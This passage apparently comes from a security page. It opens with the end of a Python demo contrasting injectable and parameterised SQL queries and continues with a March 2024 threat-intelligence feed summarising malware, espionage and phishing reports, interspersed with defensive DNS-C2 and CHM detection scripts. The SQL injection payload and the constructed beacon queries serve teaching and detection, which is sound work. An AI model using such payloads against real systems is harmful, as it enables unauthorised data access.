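    in the input terminates the literal and the remainder is parsed as SQL."""
    sql = "SELECT hostname, owner FROM endpoints WHERE hostname = '" + hostname + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, hostname: str):
    """Same query with a bound parameter: the value travels to the engine
    separately from the statement text and cannot alter its structure."""
    return conn.execute(
        "SELECT hostname, owner FROM endpoints WHERE hostname = ?", (hostname,)
    ).fetchall()


# Constructed payload: closes the string literal and appends an always-true predicate.
PAYLOAD = "' OR '1'='1"


def demo():
    """Run both lookups against the constructed table and return the rows each produced."""
    conn = build_db()
    return {
        "legit_vulnerable": vulnerable_lookup(conn, "ws-01"),
        "injected_vulnerable": vulnerable_lookup(conn, PAYLOAD),
        "injected_safe": safe_lookup(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

The vulnerable path returns every row for the payload because the statement became `WHERE hostname = '' OR '1'='1'`; the parameterised path returns nothing because the engine looks for a hostname literally equal to the payload string. Parameterisation, not input filtering, is the fix to look for when reviewing a patch for a bug of this class.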
2024-03-28
Cyber_Espionage_Campaign_Targeting_Indian_Government_Entities_and_Energy_Sector
MEDIUM
+
Intel Source:
EclecticIQ
Intel Name:
Cyber_Espionage_Campaign_Targeting_Indian_Government_Entities_and_Energy_Sector
Date of Scan:
2024-03-28
Impact:
MEDIUM
Summary:
Researchers at EclecticIQ have discovered a new espionage effort that uses a customized version of HackBrowserData, an open-source information stealer that can gather cookies, history, and browser login credentials, to target Indian government entities and the nation's energy sector.
Source: https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign
2024-03-28
JavaScript_to_AsyncRAT_Transition
LOW
+
Intel Source:
ISC.SANS
Intel Name:
JavaScript_to_AsyncRAT_Transition
Date of Scan:
2024-03-28
Impact:
LOW
Summary:
SANS researchers analyzed an intriguing, effectively obfuscated piece of JavaScript named "_Rechnung_01941085434_PDF.js" ("Rechnung" is German for invoice). The first obfuscation technique is simple yet effective: it prevents many analysis utilities from working correctly on distributions such as REMnux.
Source: https://isc.sans.edu/diary/From+JavaScript+to+AsyncRAT/30788
2024-03-28
A_New_Info_Stealer_Named_Sync_Scheduler
LOW
+
Intel Source:
CYFIRMA Research
Intel Name:
A_New_Info_Stealer_Named_Sync_Scheduler
Date of Scan:
2024-03-28
Impact:
LOW
Summary:
Cyfirma researchers have found Sync-Scheduler, an information-stealing malware that targets documents in particular and has anti-analysis built in. The research details the procedures used to create malware payloads and investigates the evasion strategies used by threat actors to avoid detection through in-depth examination.
Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_sync-scheduler-stealer-activity-7178734723601485824-gOFs?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy
2024-03-28
The_Tax_Scam_Tsunami
LOW
+
Intel Source:
Checkpoint
Intel Name:
The_Tax_Scam_Tsunami
Date of Scan:
2024-03-28
Impact:
LOW
Summary:
The Check Point Research team has observed multiple tax-related phishing scams and malware campaigns aimed at inducing end users to hand over sensitive information or money.
Source: https://blog.checkpoint.com/security/beware-the-tax-scam-tsunami-unmasking-qr-code-schemes-bogus-refunds-and-ai-imposters/
2024-03-28
DinodasRAT_Linux_backdoor
MEDIUM
+
Intel Source:
Securelist
Intel Name:
DinodasRAT_Linux_backdoor
Date of Scan:
2024-03-28
Impact:
MEDIUM
Summary:
DinodasRAT, also known as XDealer, is a multi-platform backdoor written in C++ that offers a range of capabilities. This RAT allows the malicious actor to surveil and harvest sensitive data from a target’s computer. A Windows version of this RAT was used in attacks against government entities in Guyana.
Source: https://securelist.com/dinodasrat-linux-implant/112284/
2024-03-27
Enhance_Cyberespionage_Activities_Against_ASEAN_Nations_by_Two_Chinese_APT_Groups
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
Enhance_Cyberespionage_Activities_Against_ASEAN_Nations_by_Two_Chinese_APT_Groups
Date of Scan:
2024-03-27
Impact:
MEDIUM
Summary:
Researchers from Unit 42 have identified two Chinese advanced persistent threat (APT) groups conducting cyberespionage against members of, and organizations connected to, the Association of Southeast Asian Nations (ASEAN). The first group, Stately Taurus, is believed to have targeted entities in Myanmar, the Philippines, Japan, and Singapore with two malware packages. The second group infiltrated an ASEAN-affiliated entity and in recent months has attacked a number of government institutions in Southeast Asia, including in Singapore, Laos, and Cambodia.
Source: https://unit42.paloaltonetworks.com/chinese-apts-target-asean-entities/
2024-03-27
A_Robust_Cyberthreat_to_Brazil_Monetary_Security_CHAVECLOAK
LOW
+
Intel Source:
SOC Radar
Intel Name:
A_Robust_Cyberthreat_to_Brazil_Monetary_Security_CHAVECLOAK
Date of Scan:
2024-03-27
Impact:
LOW
Summary:
CHAVECLOAK is a banking trojan that has become a serious threat to the Brazilian financial system. This sophisticated malware is designed to bypass security measures and steal confidential financial data from unsuspecting users.
Source: https://socradar.io/chavecloak-cyber-threat-to-brazils-financial-security/
2024-03-27
FormBook_Malware
MEDIUM
+
Intel Source:
Rewterz
Intel Name:
FormBook_Malware
Date of Scan:
2024-03-27
Impact:
MEDIUM
Summary:
FormBook, an information stealer (infostealer) malware discovered in 2016, has various capabilities such as tracking keystrokes, accessing files, capturing screenshots, and stealing passwords from web browsers. It can execute additional malware as directed by a command-and-control server and is adept at evading detection through techniques like code obfuscation and encryption. FormBook's flexibility allows customization for specific targets and its obfuscation methods make removal challenging. Cybercriminals distribute FormBook through email attachments like PDFs and Office Documents, with notable use during the 2022 Russia-Ukraine conflict. FormBook's successor, XLoader, is currently active.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-formbook-malware-active-iocs-98
2024-03-27
Increase_in_activity_linked_to_Mispadu_banking_trojan
LOW
+
Intel Source:
Morphisec
Intel Name:
Increase_in_activity_linked_to_Mispadu_banking_trojan
Date of Scan:
2024-03-27
Impact:
LOW
Summary:
Morphisec Labs identified a significant increase in activity linked to Mispadu, a banking trojan first flagged in 2019. Initially concentrated on LATAM countries and Spanish-speaking individuals, Mispadu has broadened its scope in the latest campaign.
Source: https://blog.morphisec.com/mispadu-infiltration-beyond-latam
2024-03-27
Introducing_The_Most_Recent_Version_of_WhiteSnake_Stealer
LOW
+
Intel Source:
SonicWall
Intel Name:
Introducing_The_Most_Recent_Version_of_WhiteSnake_Stealer
Date of Scan:
2024-03-27
Impact:
LOW
Summary:
Researchers at SonicWall discovered a new version of WhiteSnake Stealer that steals sensitive, private information from infected systems. The string-decryption code has been removed in this version, which also makes the code easier to understand.
Source: https://blog.sonicwall.com/en-us/2024/03/whitesnake-stealer-unveiling-the-latest-version-less-obfuscated-more-dangerous/
2024-03-27
The_Effects_of_the_Anydesk_Breach
LOW
+
Intel Source:
Cybereason
Intel Name:
The_Effects_of_the_Anydesk_Breach
Date of Scan:
2024-03-27
Impact:
LOW
Summary:
Researchers at Cybereason examined cases of AnyDesk code-signing certificates being misused. On February 2, 2024, AnyDesk, a prominent global supplier of Remote Monitoring and Management (RMM) software, publicly announced that it had discovered a compromise of its production systems. It started an incident response process and, as part of remediation, revoked all security-related certificates and issued fresh ones.
Source: https://www.cybereason.com/blog/threat-alert-the-anydesk-breach-aftermath
2024-03-27
The_Shadowy_Side_Of_TheMoon_Malware
LOW
+
Intel Source:
Lumen
Intel Name:
The_Shadowy_Side_Of_TheMoon_Malware
Date of Scan:
2024-03-27
Impact:
LOW
Summary:
Researchers at Lumen discovered a multi-year campaign targeting Internet of Things (IoT) devices and routers nearing end of life (EoL). The campaign is linked to an upgraded version of the malware known as "TheMoon". Active since 2014, TheMoon has been running quietly in the background and amassed almost 40,000 bots from 88 countries in January and February 2024. Most of these bots serve as the backbone of Faceless, a well-known proxy service marketed to cybercriminals.
Source: https://blog.lumen.com/the-darkside-of-themoon/?utm_source=rss&utm_medium=rss&utm_campaign=the-darkside-of-themoon
2024-03-27
Cyberattacks_Risk_Thousands_of_Businesses_Using_Ray_Framework
LOW
+
Intel Source:
Oligo Security
Intel Name:
Cyberattacks_Risk_Thousands_of_Businesses_Using_Ray_Framework
Date of Scan:
2024-03-27
Impact:
LOW
Summary:
Researchers at Oligo uncovered an ongoing campaign of attacks exploiting a flaw in the popular open-source AI framework Ray. The vulnerability has no patch and exposes thousands of businesses and servers running AI infrastructure: attackers can commandeer the organizations' computing power and expose confidential information. It has been actively exploited for the past seven months, impacting industries including biopharma, education, and cryptocurrency.
Source: https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild
2024-03-26
Custom_PowerShell_Script_Allows_Agenda_Ransomware_to_Spread_to_vCenters_and_ESXi
LOW
+
Intel Source:
TrendMicro
Intel Name:
Custom_PowerShell_Script_Allows_Agenda_Ransomware_to_Spread_to_vCenters_and_ESXi
Date of Scan:
2024-03-26
Impact:
LOW
Summary:
TrendMicro researchers discovered newer variants of the ransomware, particularly its Rust variant. Based on their observations, the Agenda ransomware gang deploys the ransomware binary using Cobalt Strike and Remote Monitoring and Management (RMM) tools. The Agenda executable can spread using PsExec and SecureShell, and abuses vulnerable SYS drivers to bypass security measures.
Source: https://www.trendmicro.com/en_us/research/24/c/agenda-ransomware-propagates-to-vcenters-and-esxi-via-custom-pow.html
2024-03-26
The_rise_of_Agent_Tesla
MEDIUM
+
Intel Source:
Trustwave
Intel Name:
The_rise_of_Agent_Tesla
Date of Scan:
2024-03-26
Impact:
MEDIUM
Summary:
SpiderLabs discovered a phishing email on March 8, 2024, carrying a Windows executable disguised as a bank payment notification. The attachment initiated an infection chain culminating in the deployment of Agent Tesla. The Trustwave blog shares a deep analysis of the newly identified loader, detailing the tactics, techniques, and procedures (TTPs) used in both the loader and its command and control (C2) framework.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/agent-teslas-new-ride-the-rise-of-a-novel-loader/
2024-03-26
Phishing_Attack_Designed_to_Steal_Security_Information_And_Credentials
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Phishing_Attack_Designed_to_Steal_Security_Information_And_Credentials
Date of Scan:
2024-03-26
Impact:
LOW
Summary:
CERT-AGID researchers have discovered a phishing page targeting users of the Italian Revenue Agency's Siatel v2.0 – Punto Fisico service, live online since the early afternoon of March 21, 2024. After victims are tricked into entering their tax code and password as access credentials, the attackers ask them to upload a photo of, or fill in, the Security Matrix associated with those credentials. That matrix governs access to Punto Fisico, the Report Register, and Punto Fisico User Management.
Source: https://cert-agid.gov.it/news/agenzia-delle-entrate-punto-fisico-campagna-di-phishing-mirata-al-furto-di-credenziali-e-matrici-di-sicurezza/
2024-03-26
Phishing_Kit_With_New_MFA_Targeting_Gmail_And_Microsoft_365_Accounts
LOW
+
Intel Source:
Sekoia
Intel Name:
Phishing_Kit_With_New_MFA_Targeting_Gmail_And_Microsoft_365_Accounts
Date of Scan:
2024-03-26
Impact:
LOW
Summary:
Sekoia researchers first detected Tycoon 2FA in October 2023 during routine threat hunting, though it has been operational since August 2023, when the Saad Tycoon group began offering it through private Telegram channels. The Sekoia team analyzed the Tycoon 2FA phishing-as-a-service (PhaaS) kit in depth and shared some of its findings with the Twitter community. Since then, researchers have closely tracked the putative developer's activity, campaigns using the kit, source-code updates, and the infrastructure behind Tycoon 2FA phishing URLs.
Source: https://blog.sekoia.io/tycoon-2fa-an-in-depth-analysis-of-the-latest-version-of-the-aitm-phishing-kit/#h-iocs-amp-technical-details
2024-03-26
An_Attempt_to_Phish_Outlook_Addresses_PAs
MEDIUM
+
Intel Source:
CERT-AGID
Intel Name:
An_Attempt_to_Phish_Outlook_Addresses_PAs
Date of Scan:
2024-03-26
Impact:
MEDIUM
Summary:
CERT-AgID has reported an ongoing campaign targeting public administrations (PAs) that aims to harvest Microsoft Outlook email credentials. Attackers posing as company HR or accounting departments send fraudulent emails offering salary adjustments or access to electronic payslips in order to lure victims into entering their login passwords and other sensitive data.
Source: https://cert-agid.gov.it/news/campagna-di-phishing-outlook-rivolta-alle-pa/
2024-03-26
Unraveling_the_Kimsuky_Groups_Malware_Attacks_on_South_Korea
LOW
+
Intel Source:
ASEC
Intel Name:
Unraveling_the_Kimsuky_Groups_Malware_Attacks_on_South_Korea
Date of Scan:
2024-03-26
Impact:
LOW
Summary:
The Kimsuky group's latest cyber-espionage campaigns against South Korean targets use a dropper masquerading as an installer from a public institution together with the Endoor and Nikidoor backdoors for system infiltration and data theft. The attacks combine social engineering, abuse of legitimate certificates, and command-and-control servers to achieve stealth, persistence, and exfiltration, underscoring the ongoing threat posed by Kimsuky's evolving tactics and the need for up-to-date defenses.
Source: https://asec.ahnlab.com/en/63396/
2024-03-25
Cobalt_strike_DNS_early_detection
LOW
+
Intel Source:
Infoblox
Intel Name:
Cobalt_strike_DNS_early_detection
Date of Scan:
2024-03-25
Impact:
LOW
Summary:
Infoblox presented a study demonstrating the value of early detection of attempted DNS exfiltration and Cobalt Strike DNS command-and-control (C2) communications. The study focused on two anonymized customers: a large e-commerce/retail company (Customer #1) and an educational institution (Customer #2).
Source: https://blogs.infoblox.com/cyber-threat-intelligence/dns-early-detection-cobalt-strike-dns-c2/
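The kind of early detection the Infoblox study describes can be approximated from plain resolver logs. The Python script below is an added example, not code from Infoblox or from the report: it aggregates, per registered domain, the ratio of unique subdomains, the entropy and length of the longest query label, and the share of TXT lookups, then flags domains whose queries look like encoded beacon traffic rather than name resolution. The log format, the thresholds, the two-label registered-domain heuristic and the beacon domain update-check.net are all assumptions made for the example; the log lines are constructed.

```python
import math
import re
from collections import defaultdict

# Constructed sample DNS query log (not taken from the Infoblox report).
# Assumed format: "<timestamp> <client_ip> <qtype> <qname>".
# example.com stands in for ordinary browsing; update-check.net is a hypothetical
# beacon domain whose subdomains carry hex-encoded data, the pattern a DNS C2
# channel such as Cobalt Strike's leaves in resolver logs.
SAMPLE_LOG = """\
2024-03-25T10:00:01Z 10.1.2.3 A www.example.com
2024-03-25T10:00:02Z 10.1.2.3 A cdn.example.com
2024-03-25T10:00:03Z 10.1.2.3 A post.3f9a0c7e1b5d2846f3a9c07eb15d2864.update-check.net
2024-03-25T10:00:04Z 10.1.2.3 TXT api.a4e8c2d6b0f195377391f0b6d2c8e4a5.update-check.net
2024-03-25T10:00:05Z 10.1.2.3 A mail.example.com
2024-03-25T10:00:06Z 10.1.2.3 A post.e1d5b9f3a7c0284662480c7a3f9b5d1e.update-check.net
2024-03-25T10:00:07Z 10.1.2.3 A www.example.com
2024-03-25T10:00:08Z 10.1.2.3 TXT api.0b6c2a8f4e1d9537735d9e4f8a2c6b01.update-check.net
2024-03-25T10:00:09Z 10.1.2.3 A login.microsoftonline.com
2024-03-25T10:00:10Z 10.1.2.3 A post.5c3e7a1f9d0b48266248b0d9f1a7e3c5.update-check.net
2024-03-25T10:00:11Z 10.1.2.3 A cdn.example.com
2024-03-25T10:00:12Z 10.1.2.3 A post.9e7b5d3f1a0c28644862c0a1f3d5b7e9.update-check.net
2024-03-25T10:00:13Z 10.1.2.3 A www.example.com
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_line(line):
    """Return (timestamp, client, qtype, qname) or None for blank/malformed lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, qtype, qname = m.groups()
    return ts, client, qtype.upper(), qname.rstrip(".").lower()


def registered_domain(qname):
    """Last two labels. Assumption: no public-suffix list, so co.uk-style
    suffixes would need a PSL lookup in production."""
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def shannon_entropy(s):
    """Bits per character: hex-encoded data scores close to 4.0, words well below."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def analyze(log_text, min_queries=5):
    """Per registered domain: unique-subdomain ratio, mean entropy and length of
    the longest subdomain label, and share of TXT queries."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(),
                                 "txt": 0, "entropy_sum": 0.0, "len_sum": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        _, _, qtype, qname = rec
        base = registered_domain(qname)
        sub = qname[: -len(base) - 1] if len(qname) > len(base) else ""
        longest = max(sub.split("."), key=len) if sub else ""
        d = stats[base]
        d["queries"] += 1
        d["subdomains"].add(sub)
        if qtype == "TXT":
            d["txt"] += 1
        d["entropy_sum"] += shannon_entropy(longest)
        d["len_sum"] += len(longest)
    results = {}
    for base, d in stats.items():
        n = d["queries"]
        if n < min_queries:  # too few lookups to judge; skip
            continue
        results[base] = {
            "queries": n,
            "unique_subdomain_ratio": len(d["subdomains"]) / n,
            "mean_entropy": d["entropy_sum"] / n,
            "mean_label_len": d["len_sum"] / n,
            "txt_ratio": d["txt"] / n,
        }
    return results


def flag_suspicious(results, min_ratio=0.8, min_entropy=3.0, min_label_len=20):
    """Domains where almost every query carries a new, long, high-entropy label."""
    return sorted(base for base, m in results.items()
                  if m["unique_subdomain_ratio"] >= min_ratio
                  and m["mean_entropy"] >= min_entropy
                  and m["mean_label_len"] >= min_label_len)


if __name__ == "__main__":
    metrics = analyze(SAMPLE_LOG)
    for base, m in sorted(metrics.items()):
        print(base, {k: round(v, 2) for k, v in m.items()})
    print("suspicious:", flag_suspicious(metrics))
```

The three signals are deliberately independent: a CDN with many hostnames has a high unique-subdomain ratio but low entropy, and a long but human-readable label has length without entropy. Tune the thresholds against a week of your own resolver logs before alerting on them, and allow-list telemetry or anti-spam services that legitimately encode data in labels.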
2024-03-25
Attack_using_fake_Python_Infrastructure
LOW
+
Intel Source:
Checkmarx
Intel Name:
Attack_using_fake_Python_Infrastructure
Date of Scan:
2024-03-25
Impact:
LOW
Summary:
This month, Checkmarx researchers discovered a campaign targeting the software supply chain, with evidence that multiple victims were successfully compromised, including the Top.gg GitHub organization (a community of over 170k users) and several individual developers.
Source: https://checkmarx.com/blog/over-170k-users-affected-by-attack-using-fake-python-infrastructure/
2024-03-25
German_political_parties_attacked_by_APT29_with_WINELOADER
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
German_political_parties_attacked_by_APT29_with_WINELOADER
Date of Scan:
2024-03-25
Impact:
MEDIUM
Summary:
In late February 2024, Mandiant identified APT29 — a Russian Federation-backed threat group linked by multiple governments to Russia’s Foreign Intelligence Service (SVR) — conducting a phishing campaign targeting German political parties.
Source: https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties
2024-03-25
Reverse_Engineering_Snake_Keylogger_analysis
LOW
+
Intel Source:
Any.Run
Intel Name:
Reverse_Engineering_Snake_Keylogger_analysis
Date of Scan:
2024-03-25
Impact:
LOW
Summary:
An Any.Run researcher walked through a sandbox analysis of Snake Keylogger to understand the malware's behavior. The sandbox findings provide a foundation for reverse engineering Snake Keylogger, indicating what to anticipate and which specific aspects to investigate during the reverse-engineering process.
Source: https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/
2024-03-25
Attackers_next_target_ML_AI_models
LOW
+
Intel Source:
Sonatype
Intel Name:
Attackers_next_target_ML_AI_models
Date of Scan:
2024-03-25
Impact:
LOW
Summary:
Sonatype analysts examined several open-source ML/AI models shared by data scientists and security researchers that demonstrate how malware can be smuggled onto AI model platforms. Other examples include malicious models that community members had already reported and that have since been removed from the platform.
Source: https://blog.sonatype.com/open-source-ml/ai-models-attackers-next-potential-target
2024-03-25
Online_scams_during_Ramadan_and_Eid_Fitr
LOW
+
Intel Source:
Resecurity
Intel Name:
Online_scams_during_Ramadan_and_Eid_Fitr
Date of Scan:
2024-03-25
Impact:
LOW
Summary:
During Ramadan this month, Resecurity researchers observed a significant spike in fraud and scam activity, coinciding with a surge in retail and online transactions.
Source: https://www.resecurity.com/blog/article/cybercriminals-accelerate-online-scams-during-ramadan-and-eid-fitr
2024-03-25
New_Go_loader_uses_Rhadamanthys_stealer
MEDIUM
+
Intel Source:
Malwarebytes
Intel Name:
New_Go_loader_uses_Rhadamanthys_stealer
Date of Scan:
2024-03-25
Impact:
MEDIUM
Summary:
Malwarebytes researchers describe a malvertising campaign delivering a new loader written in Go that deploys the Rhadamanthys stealer as its payload. The lure is PuTTY, a popular SSH and Telnet client for Windows that IT admins have used for years: the threat actor bought a Google ad impersonating the PuTTY homepage, which appeared at the top of the search results page, above the official website.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/03/new-go-loader-pushes-rhadamanthys
2024-03-22
Technical_Analysis_of_FalseFont_Backdoor
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
Technical_Analysis_of_FalseFont_Backdoor
Date of Scan:
2024-03-22
Impact:
MEDIUM
Summary:
The article provides a detailed analysis of the FalseFont backdoor, new malware developed by the Curious Serpens threat actor that targets the aerospace and defense industries by masquerading as legitimate human resources software. It covers the backdoor's architecture, functionality, and communication with its operators, including the predefined commands, real-time interaction over SignalR, and the recurring requests the backdoor sends to its command-and-control server. It also provides detection and prevention guidance, indicators of compromise, and recommendations for improving security practices.
Source: https://unit42.paloaltonetworks.com/curious-serpens-falsefont-backdoor/
2024-03-22
Chinese_Government_Hacker_Using_ScreenConnect_and_F5_Bugs_to_Attack_Defense_and_Government_Entities
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
Chinese_Government_Hacker_Using_ScreenConnect_and_F5_Bugs_to_Attack_Defense_and_Government_Entities
Date of Scan:
2024-03-22
Impact:
MEDIUM
Summary:
A threat actor suspected of ties to the People's Republic of China has been exploiting two widely abused vulnerabilities, in ConnectWise ScreenConnect and F5 BIG-IP, to attack U.S. defense contractors, U.K. government entities, and institutions in Asia.
Source: https://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect
2024-03-22
AcidPour_new_embedded_wiper_variant_of_AcidRain
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
AcidPour_new_embedded_wiper_variant_of_AcidRain
Date of Scan:
2024-03-22
Impact:
MEDIUM
Summary:
The article covers the discovery of AcidPour, a new variant of the AcidRain wiper that has caused disruptions in Ukraine and Europe during the Russian invasion. It provides an overview of the AcidPour sample, including its MD5, SHA1, and SHA256 hashes, size, and file type, and highlights the similarities between AcidRain and AcidPour as well as the functionality AcidPour adds for handling Unsorted Block Image (UBI) and Device Mapper (DM) logic. It also notes AcidPour's coding style, its self-delete function, and its alternate device-wiping mechanism.
Source: https://www.sentinelone.com/labs/acidpour-new-embedded-wiper-variant-of-acidrain-appears-in-ukraine/
2024-03-22
TA450_Uses_Embedded_Links_in_PDF_Attachments
LOW
+
Intel Source:
Proofpoint
Intel Name:
TA450_Uses_Embedded_Links_in_PDF_Attachments
Date of Scan:
2024-03-22
Impact:
LOW
Summary:
The article covers a recent phishing campaign by the threat actor TA450 targeting Israeli employees at large multinational organizations. The campaign used a pay-related social-engineering lure and PDF attachments containing malicious links to file-sharing sites, a change in tactics for an actor that typically places malicious links directly in email bodies. The sender email account matched the lure content, continuing TA450's trend of targeting Israeli individuals with Hebrew-language lures and compromised .IL accounts. The report provides Emerging Threats (ET) signatures and indicators of compromise so organizations can defend against this threat.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign
2024-03-22
New_Details_on_TinyTurla_Post_Compromise_Activity
LOW
+
Intel Source:
Talos
Intel Name:
New_Details_on_TinyTurla_Post_Compromise_Activity
Date of Scan:
2024-03-22
Impact:
LOW
Summary:
The article covers the ongoing campaign by the Russian espionage group Turla, specifically its use of the TinyTurla-NG implant, and reveals new tactics, techniques, and procedures (TTPs) the group uses to steal valuable information and spread through infected networks. The analysis, conducted with CERT.NGO, shows that Turla compromised multiple systems in a European NGO's network. The attackers took preliminary post-compromise actions such as establishing persistence and adding exclusions to anti-virus products, and used a custom build of the open-source Chisel tunneling tool as a beacon. The article includes a visual representation of the infection chain, guidance on detecting and blocking the threat, and a list of associated hashes, domains, and IP addresses.
Source: https://blog.talosintelligence.com/tinyturla-full-kill-chain/
2024-03-22
Pig_butchering_scams
LOW
+
Intel Source:
Talos
Intel Name:
Pig_butchering_scams
Date of Scan:
2024-03-22
Impact:
LOW
Summary:
The Talos newsletter discusses the evolution of social-engineering tactics, specifically "catfishing" or "romance scams", in which scammers build relationships with targets in order to defraud them. It explains how "pig butchering" differs from traditional romance scams and emphasizes the importance of user education and law enforcement involvement. It then turns to Talos' research on the Turla APT and its use of the new TinyTurla-NG tool to target Polish NGOs and steal sensitive data, mentions Talos' detection content for Cisco Secure products, and closes with the top security headlines of the week.
Source: https://blog.talosintelligence.com/threat-source-newsletter-march-21-2024/
2024-03-22
Massive_StrelaStealer_Initiative_in_First_Half_of_2024
LOW
+
Intel Source:
PaloAlto
Intel Name:
Massive_StrelaStealer_Initiative_in_First_Half_of_2024
Date of Scan:
2024-03-22
Impact:
LOW
Summary:
Researchers at Palo Alto Networks have identified a wave of large-scale StrelaStealer campaigns affecting more than 100 organizations in the US and the EU. The campaigns take the form of spam emails with attachments that ultimately launch the StrelaStealer DLL payload.
Source: https://unit42.paloaltonetworks.com/strelastealer-campaign/#post-133130-_vl741f7mzldf
2024-03-21
Caution_Regarding_Infostealer_Posing_as_Installer
LOW
+
Intel Source:
ASEC
Intel Name:
Caution_Regarding_Infostealer_Posing_as_Installer
Date of Scan:
2024-03-21
Impact:
LOW
Summary:
Researchers from ASEC have observed widespread distribution of the StealC malware disguised as an installer, downloaded via Dropbox, GitHub, Discord, and other services. Based on previous incidents using similar distribution paths, victims are likely redirected several times from a malicious webpage masquerading as the download page for a specific program before reaching the final download URL.
Source: https://asec.ahnlab.com/en/63308/
2024-03-21
Numerous_Chinese_State_Sponsored_Groups_Are_Associated_With_Private_Contractor
LOW
+
Intel Source:
Recorded Future
Intel Name:
Numerous_Chinese_State_Sponsored_Groups_Are_Associated_With_Private_Contractor
Date of Scan:
2024-03-21
Impact:
LOW
Summary:
Recorded Future's Insikt Group provides a fresh perspective on the i-SOON leak. On February 18, 2024, an anonymous leak of documents from Anxun Information Technology Co., Ltd. (i-SOON), a Chinese cybersecurity and IT company, exposed details of China's state-sponsored cyber espionage operations. The breach is noteworthy because it reveals links between i-SOON and several Chinese state-sponsored groups, including RedAlpha, RedHotel, and POISON CARP, pointing to a complex web of espionage activity that includes the theft of communications records to track specific individuals.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0320.pdf
2024-03-21
AceCryptor_Malware_Increased_Throughout_Europe
LOW
+
Intel Source:
Welivesecurity
Intel Name:
AceCryptor_Malware_Increased_Throughout_Europe
Date of Scan:
2024-03-21
Impact:
LOW
Summary:
ESET researchers, who have studied AceCryptor for years, report that the latest campaign differs from earlier ones in the expanded arsenal of malicious code the attackers deliver. AceCryptor is typically used to pack Remcos (also known as Rescoms), a powerful remote surveillance tool that researchers have frequently observed being used against Ukrainian businesses.
Source: https://www.welivesecurity.com/en/eset-research/rescoms-rides-waves-acecryptor-spam/
2024-03-21
New_Sysrv_botnet_variant_spreads_XMRig_Miner
MEDIUM
+
Intel Source:
Imperva
Intel Name:
New_Sysrv_botnet_variant_spreads_XMRig_Miner
Date of Scan:
2024-03-21
Impact:
MEDIUM
Summary:
A new variant of the Sysrv botnet was observed exploiting vulnerabilities in Apache Struts and Atlassian Confluence to spread an XMRig cryptominer payload. The malware used a compromised Malaysian academic website and a Google subdomain to distribute its malicious files, and adds obfuscation and architecture-preparation functions. It connects to MoneroOcean mining-pool endpoints and mines to a specific wallet. Defenders should block suspicious outbound connections and inspect seemingly legitimate sites for malicious files.
Source: https://www.imperva.com/blog/new-sysrv-botnet-variant-makes-use-of-google-subdomain-to-spread-xmrig-miner/
2024-03-21
Investigations_into_CVE_2024_21762_Vulnerability_and_Fortinet_FortiOS
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Investigations_into_CVE_2024_21762_Vulnerability_and_Fortinet_FortiOS
Date of Scan:
2024-03-21
Impact:
LOW
Summary:
ISC SANS handlers noticed that an exploit for CVE-2024-21762, a vulnerability in Fortinet's FortiOS, has been published on GitHub. Fortinet released a patch on February 8, giving device owners more than a month to apply the fix. A few days before it appeared on GitHub, the exploit was circulating on the Chinese QQ messaging network.
Source: https://isc.sans.edu/diary/Scans+for+Fortinet+FortiOS+and+the+CVE202421762+vulnerability/30762/
2024-03-21
The_Kimsuky_threat_actor_group_activity
MEDIUM
+
Intel Source:
Rapid7
Intel Name:
The_Kimsuky_threat_actor_group_activity
Date of Scan:
2024-03-21
Impact:
MEDIUM
Summary:
The Rapid7 article covers the latest tactics and techniques of the Kimsuky threat actor group, also known as Black Banshee or Thallium. The North Korean group focuses primarily on intelligence gathering and has targeted South Korean government entities, individuals involved in the Korean peninsula's unification process, and global experts in fields relevant to the regime's interests. Its methods have evolved from weaponized Office documents to ISO files and shortcut (LNK) files to bypass modern security controls, and the latest findings show it now using CHM (compiled HTML help) files to deliver malware and gain access to targets. The report analyzes a CHM file used by the group, including its file structure, language, and code snippets, and explains how the group uses HTML and ActiveX inside the CHM to execute arbitrary commands on the victim's machine and establish persistence. It includes a visualization of the attack flow and a list of detections that Rapid7 customers can use against this campaign.
Source: https://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/
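As an added example of the detection side of this technique (not code from Rapid7 or from the report): once a CHM has been decompiled to its HTML pages (for instance with `hh.exe -decompile <dir> <file.chm>` on Windows, or 7-Zip elsewhere), the Python script below finds the HTML Help ActiveX "shortcut" objects that CHM droppers use to run commands, extracts the program and arguments from each object's Item1 parameter, and notes whether an inline script auto-clicks the object. The CLSID and the Item1 layout are those of the Windows HTML Help control (hhctrl.ocx); the sample page is constructed for the example and launches only a harmless echo.

```python
import re
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (hhctrl.ocx). An <OBJECT> with this classid
# and Command="ShortCut" runs the program named in its Item1 parameter.
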